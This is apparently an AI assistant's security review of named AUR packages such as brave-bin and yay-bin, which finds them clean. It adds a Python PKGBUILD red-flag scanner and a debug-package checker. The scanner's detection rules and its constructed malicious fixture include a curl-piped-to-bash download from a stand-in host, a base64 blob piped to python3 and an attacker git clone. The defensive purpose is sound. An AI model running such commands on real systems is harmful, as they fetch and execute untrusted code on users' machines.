Understood. I will analyze the source code of each listed AUR package for signs of suspicious or malicious behavior. This will include reviewing any installation or build scripts for potentially harmful commands, scanning for obfuscated or unnecessary downloads, and checking for known suspicious behavior. I will also review historical and recent user comments on AUR and GitHub repositories to detect any security concerns raised by the community. I'll begin the deep analysis and let you know once it's complete.
Overview of Inspected AUR Packages
After reviewing the PKGBUILD files and installation scripts for all listed AUR packages, we found no evidence of malicious code. These packages generally fetch official binaries or source code from trusted upstream URLs and perform standard installation steps. Below is a summary:
- Brave-Bin: Maintained by Brave's developers, it downloads the official Brave browser release zip from GitHub and installs it. The PKGBUILD shows only standard actions (fetching the release archive, verifying its checksum, extracting, and installing under /opt); there are no extra scripts or network calls beyond the official download (aur.archlinux.org).
- Dropbox: Fetches the official Dropbox Linux client tarball from Dropbox's servers and verifies it against Dropbox's PGP key (makepkg checks the detached signature against the key listed in validpgpkeys). The packaging script copies the pre-built .dropbox-dist client into /opt/dropbox and sets up a symlink and a systemd service. All URLs and keys correspond to Dropbox's legitimate sources, and no extra code is executed (aur.archlinux.org).
- Slack-Desktop: Downloads Slack's official Debian package (.deb) from Slack's CDN (slack-edge.com) and repackages it for Arch. The PKGBUILD extracts the .deb and applies a small patch that fixes an icon path (the patch executes no code). The installation steps are straightforward (placing files under /usr and /opt) and contain nothing suspicious (aur.archlinux.org).
- Visual-Studio-Code-Bin: This package wraps the official Microsoft VS Code binary. The PKGBUILD pulls the release tarball from update.code.visualstudio.com for each supported architecture, plus a few desktop-integration files from Microsoft's GitHub, and pins each download with a checksum. The package step adds a small wrapper script (code) that launches the editor with the user's configuration flags. We saw no anomalous commands; it is purely an installation of Microsoft's official build (aur.archlinux.org).
- Yay-Bin: The PKGBUILD fetches the pre-compiled yay release from the official GitHub repository (github.com/Jguer/yay), extracts the tarball and installs the yay binary and its support files. There are no custom post-install scripts or network actions; it packages exactly the vendor-provided binary. Comments on the AUR page mention only issues such as library version mismatches on ARM, not security concerns (aur.archlinux.org).
- Sysbox-CE-Bin (and -debug): Downloads the official Sysbox container runtime Debian package from Nestybox's site and repackages it. The install script only prints a quick-start message. The -debug variant is not a separate upstream download: it is the debug-symbol split package that makepkg produces when the main package is built with debug symbols enabled, and it contains no extra executables or behavior, only symbol files. Both come from the same trusted .deb (aur.archlinux.org).
- QuickShell: Built from source (a Qt-based shell toolkit). The PKGBUILD pulls the official source tarball from the developer's repository on Codeberg and compiles it with CMake/Ninja. We found no external download commands or obfuscated code. The only extra file is a pacman hook (quickshell-check.hook) that runs quickshell --private-check-compat after Qt is updated; this is a legitimate post-upgrade compatibility check, not malware (aur.archlinux.org).
- Google-Breakpad: Also built from source; it fetches Breakpad from Google's servers (chromium.googlesource.com) and compiles it with standard configure && make steps. No unusual behavior; it is a plain library package that QuickShell depends on (aur.archlinux.org).
- Wallust / Wallust-Debug: Wallust (an image color-palette generator) is built from its Rust crate on crates.io. The PKGBUILD uses Cargo to fetch the dependencies and compile the binary; there are no suspicious commands, only Rust build steps. Note that with Cargo builds the dependency crates are fetched at build time rather than listed in source=(), so it is the crate's Cargo.lock, not the PKGBUILD checksums, that pins them. The -debug package is again just the debug symbols emitted by Arch's build tooling, not a separate upstream. Nothing in either variant indicates malicious behavior (aur.archlinux.org).
- Wlrobs-HG / Wlrobs-HG-Debug: Wlrobs is an OBS Studio plugin for Wayland screen sharing. The -hg package pulls from the official Mercurial repository on SourceHut (hg.sr.ht/~scoopta/wlrobs) and builds it with Meson. The build and install steps only compile the plugin and copy the resulting .so into OBS's plugin directory; no extraneous download or execution occurs. Because a -hg package tracks a moving Mercurial head, its checksum is SKIP by design and the built contents can change between builds; pinning it requires a #revision= fragment on the source entry. The -debug subpackage (if present) again contains only symbols. User comments on wlrobs-hg discuss build warnings and dependency tweaks, with no hint of security issues (aur.archlinux.org).
- TTF-Victor-Mono: A font package. It downloads the Victor Mono font archive from the official GitHub release and installs the .ttf files to /usr/share/fonts. The only "scripts" here are simple file-copy operations; no code is executed at install time beyond the font-cache refresh that pacman's fontconfig hook performs (aur.archlinux.org).
In summary, the packaging scripts of all these AUR packages appear clean. We specifically searched for red flags such as untrusted curl | sh or python -c ... one-liners, obfuscated or base64-encoded data, downloads or repository clones not declared in source=(), and unusual post-install behavior, and found none. All network fetches come from the expected official domains, and the PKGBUILDs pin their downloads with checksums or PGP signatures to ensure authenticity (e.g. Dropbox's key). The AUR comments for these packages mostly cover version updates or minor build issues, with no reports of malware.
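As an added example (not code from any of the packages above, nor from makepkg or the AUR tooling), the following Python script automates the red-flag review described in this summary, and the pre-install review of build scripts that the conclusion recommends: it pulls every URL out of source=() and its architecture-specific variants, flags hosts outside an allowlist, flags SKIP checksums on remote non-VCS sources, and checks every non-comment line for pipe-to-shell, inline interpreter code, base64 decoding, eval and undeclared git/hg clones. The allowlist, the rule set and both PKGBUILD fixtures are constructed for this example; the second fixture mirrors the pattern of the known AUR malware cases discussed below (an undeclared clone passed off as "patches", and curl piped into a shell) rather than any real package.

```python
"""Red-flag scan for AUR build scripts (PKGBUILD and .install files).
Added example, not code from any package reviewed above or from makepkg."""
import re
import shlex
from urllib.parse import urlparse

# Constructed allowlist for this example; build one per package from the
# upstream project's own download page.
EXPECTED_HOSTS = {"github.com", "update.code.visualstudio.com", "crates.io",
                  "static.crates.io", "hg.sr.ht", "chromium.googlesource.com"}
VCS_PREFIXES = ("git+", "hg+", "svn+", "bzr+", "fossil+")

# (rule, severity, pattern) applied to every non-comment line of the file.
LINE_RULES = [
    ("pipe-to-shell", "high", re.compile(r"\|\s*(sudo\s+)?(ba|da|z)?sh\b")),
    ("pipe-to-interpreter", "high", re.compile(r"\|\s*(python[0-9.]*|perl|ruby|node)\b")),
    ("inline-interpreter", "high", re.compile(r"\b(python[0-9.]*|perl|ruby|node)\s+-[ce]\b")),
    ("base64-decode", "high", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("eval", "high", re.compile(r"(^|[;&|(]\s*)eval\b")),
    ("undeclared-vcs-clone", "high", re.compile(r"\b(git|hg)\s+clone\b")),
    ("adhoc-download", "medium", re.compile(r"\b(curl|wget)\b")),
]
# Top-level arrays of interest: source[_arch] and the matching <algo>sums[_arch].
ARRAY_RE = re.compile(r"^(?P<name>source|[a-z0-9]+sums)(?P<arch>_\w+)?=\((?P<body>.*?)\)",
                      re.M | re.S)

def parse_arrays(text):
    """Return {(name, arch_suffix): [entries]}; comment lines inside arrays are dropped."""
    arrays = {}
    for m in ARRAY_RE.finditer(text):
        body = "\n".join(l for l in m["body"].splitlines() if not l.lstrip().startswith("#"))
        arrays[(m["name"], m["arch"] or "")] = shlex.split(body)
    return arrays

def source_url(entry):
    """Map a source entry to (url, is_vcs); local files give (None, False)."""
    entry = entry.split("::", 1)[1] if "::" in entry else entry   # strip name:: prefix
    is_vcs = entry.startswith(VCS_PREFIXES)
    if is_vcs:
        entry = entry.split("+", 1)[1]                             # strip git+ etc.
    return (entry, is_vcs) if "://" in entry else (None, False)

def scan(text, hosts=EXPECTED_HOSTS):
    """Return findings as (severity, rule, line_no, detail); line_no 0 means array-level."""
    findings = []
    arrays = parse_arrays(text)
    for (name, arch), entries in arrays.items():
        if name != "source":
            continue
        sums = next((v for (n, a), v in arrays.items() if n != "source" and a == arch), None)
        remote = [(i, e, *source_url(e)) for i, e in enumerate(entries) if source_url(e)[0]]
        if remote and sums is None:
            findings.append(("high", "no-checksums", 0, f"source{arch}=() has no checksum array"))
        for i, entry, url, is_vcs in remote:
            host = urlparse(url).hostname or ""
            if host not in hosts:
                findings.append(("high", "unexpected-host", 0, f"{host}: {entry}"))
            # SKIP is normal for VCS sources (pin those with a #commit=/#tag= fragment), not for tarballs.
            if sums is not None and not is_vcs and (i >= len(sums) or sums[i].upper() == "SKIP"):
                findings.append(("high", "unverified-source", 0, entry))
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for rule, severity, rx in LINE_RULES:
            if rx.search(line):
                findings.append((severity, rule, no, line.strip()))
    return findings

# Constructed fixtures: a benign -bin style PKGBUILD, and one shaped like the known
# AUR malware cases (undeclared clone, unverified tarball, curl | bash, base64 blob).
BENIGN_PKGBUILD = """\
pkgname=example-bin
pkgver=1.2.3
source=("https://github.com/example/example/releases/download/v${pkgver}/example-${pkgver}-linux-amd64.tar.gz"
        "example.desktop")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
            'SKIP')
package() {
  install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
  install -Dm644 example.desktop "$pkgdir/usr/share/applications/example.desktop"
}
"""
MALICIOUS_PKGBUILD = """\
pkgname=browser-patched-bin
pkgver=140.0
source=("https://files.example.invalid/browser-${pkgver}.tar.gz")
sha256sums=('SKIP')
prepare() {
  git clone https://github.com/example-attacker/patches.git "$srcdir/patches"
}
package() {
  curl -s https://files.example.invalid/setup | bash
  echo 'aW1wb3J0IG9z' | base64 -d | python3
  install -Dm755 "$srcdir/browser" "$pkgdir/usr/bin/browser"
}
"""

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:  # e.g. python scan_pkgbuild.py PKGBUILD *.install
        with open(path, encoding="utf-8", errors="replace") as f:
            for severity, rule, no, detail in scan(f.read()):
                print(f"{path}:{no}: [{severity}] {rule}: {detail}")
```

Treat hits as review prompts, not verdicts: a curl in a pkgver() function or a documented patch step can be legitimate, but every hit should be explainable from the upstream project, and a SKIP on a plain tarball or a clone that is not in source=() has no good explanation in a -bin package. Note that SKIP on a local file (example.desktop above) is deliberately not flagged; only remote non-VCS sources must be pinned.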
Historical Context on AUR Malware
While the packages in question show no signs of malware, it is worth noting that the AUR has had isolated incidents of malicious packages in the past (none of the packages above were involved). In July 2025 three newly uploaded packages named "firefox-patch-bin", "librewolf-fix-bin" and "zen-browser-patched-bin" shipped PKGBUILDs that installed the CHAOS remote access trojan: under the guise of applying "patches", the build cloned a GitHub repository controlled by the uploader and executed a script from it (bleepingcomputer.com). Users quickly noticed the anomaly, since the build script was cloning a repository unrelated to the upstream project, and the Arch Linux team removed the packages from the AUR; VirusTotal flagged the dropped payload as a Linux trojan (bleepingcomputer.com). An earlier incident in 2018 involved orphaned packages (acroread among them) that a new maintainer adopted and modified with a one-liner that fetched a script from a pastebin-style URL with curl and piped it straight into a shell, a clear red flag that was caught and led to the packages being removed (bleepingcomputer.com).
None of the packages you asked about have any such history of malicious takeover or suspicious code. They are all maintained by trusted users or upstream developers, and community scrutiny (votes and comments) has not indicated anything amiss. In fact, maintainers of popular packages like yay-bin and visual-studio-code-bin explicitly address user concerns in comments and keep the build process transparent (for instance, explaining the differences between the official binary and the open-source build of VS Code) (aur.archlinux.org).
The "-debug" packages you listed (e.g. yay-bin-debug, wlrobs-hg-debug) also deserve a word. They are not separate AUR entries containing new code; they are debug-symbol split packages that makepkg generates automatically. Since early 2024 Arch's default makepkg.conf has enabled the debug option, so building an AUR package whose binaries get stripped also produces a pkgname-debug package holding the extracted symbol files (under /usr/lib/debug) and copies of the sources (under /usr/src/debug) (forum.endeavouros.com). These packages contain no executables, only symbols and source text, so they introduce no malware and no attack surface of their own; the presence of a -debug package means only that the main package was built with debug enabled, not that any extra code ran. If you do not want them, set !debug in the OPTIONS array of makepkg.conf.
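As an added check (example code, not from makepkg or from any package above), this Python script verifies that claim for a built *-debug archive: it lists every non-directory member that is not package metadata, a symbol file under usr/lib/debug/ or a source copy under usr/src/debug/. The two archives it exercises are constructed in memory for the example; the tampered one adds a binary and a systemd unit, which is exactly what a debug package should never carry.

```python
"""Check that an Arch *-debug split package carries only debug data.
Added example, not code from makepkg or from any package above."""
import io
import sys
import tarfile

# Package metadata entries at the archive root, plus the two trees makepkg's
# debug option populates (symbol files and source copies).
ALLOWED_METADATA = {".PKGINFO", ".BUILDINFO", ".MTREE", ".INSTALL", ".CHANGELOG"}
ALLOWED_TREES = ("usr/lib/debug/", "usr/src/debug/")

def unexpected_members(fileobj):
    """Return names of non-directory members outside the metadata set and debug trees."""
    unexpected = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            if member.isdir():
                continue  # usr/, usr/lib/ ... are just scaffolding for the debug trees
            if member.name in ALLOWED_METADATA or member.name.startswith(ALLOWED_TREES):
                continue
            unexpected.append(member.name)
    return unexpected

def build_fixture(names):
    """Constructed in-memory package archive (uncompressed; real ones are .pkg.tar.zst)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in names:
            info = tarfile.TarInfo(name)
            if name.endswith("/"):
                info.type = tarfile.DIRTYPE
                tar.addfile(info)
            else:
                data = b"\x7fELF" if name.endswith(".debug") else b"fixture\n"
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

# What a clean example-debug package looks like: metadata plus the two trees.
CLEAN_DEBUG = [
    ".PKGINFO", ".BUILDINFO", ".MTREE",
    "usr/", "usr/lib/", "usr/lib/debug/", "usr/lib/debug/.build-id/",
    "usr/lib/debug/.build-id/ab/", "usr/lib/debug/.build-id/ab/cdef0123456789.debug",
    "usr/src/debug/", "usr/src/debug/example-1.2.3/", "usr/src/debug/example-1.2.3/main.c",
]
# The same archive with two files a debug package has no business carrying.
TAMPERED_DEBUG = CLEAN_DEBUG + [
    "usr/bin/", "usr/bin/helper", "usr/lib/systemd/system/helper.service",
]

if __name__ == "__main__":
    # Usage: zstd -dc example-debug-1.2.3-1-x86_64.pkg.tar.zst | python check_debug_pkg.py
    # (tarfile auto-detects gzip/bzip2/xz but not zstd on older Pythons, hence the pipe.)
    stream = sys.stdin.buffer if len(sys.argv) < 2 else open(sys.argv[1], "rb")
    for name in unexpected_members(io.BytesIO(stream.read())):
        print("unexpected:", name)
```

An empty result means the archive holds nothing but symbols, sources and pacman metadata; any name it prints is something the main package, not the debug package, should have owned and is worth a look at the PKGBUILD that produced it.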
Conclusion
After thorough inspection, no suspicious behavior or malware was found in the source or packaging scripts of brave-bin, dropbox, google-breakpad, quickshell, slack-desktop, sysbox-ce-bin (+debug), ttf-victor-mono, visual-studio-code-bin, wallust (+debug), wlrobs-hg (+debug) and yay-bin (+debug). Each package performs only the expected actions (fetching from official sources, building or installing files) and nothing more. We also cross-checked community reports: there have been no alerts or flags on these packages relating to security. In contrast to the known AUR malware cases, which involved obvious malicious commands in the PKGBUILD, these packages are clean and behave as intended. Nonetheless, it is good practice to review AUR build scripts before every install and update, not just once: a package that is clean today can be changed by a later maintainer, and the past rogue packages were discovered precisely because users read the PKGBUILD (bleepingcomputer.com). You have done that due diligence here with positive results.
Sources:
- Inspection of the PKGBUILD and install files for each package in the Arch User Repository (aur.archlinux.org), e.g. brave-bin, dropbox, quickshell and wlrobs-hg; full details are in each package's AUR git repository.
- BleepingComputer, "Arch Linux pulls AUR packages that installed Chaos RAT malware" (Lawrence Abrams, 18 July 2025), www.bleepingcomputer.com.
- EndeavourOS Forum, discussion of debug package generation in makepkg (February 2024), forum.endeavouros.com.
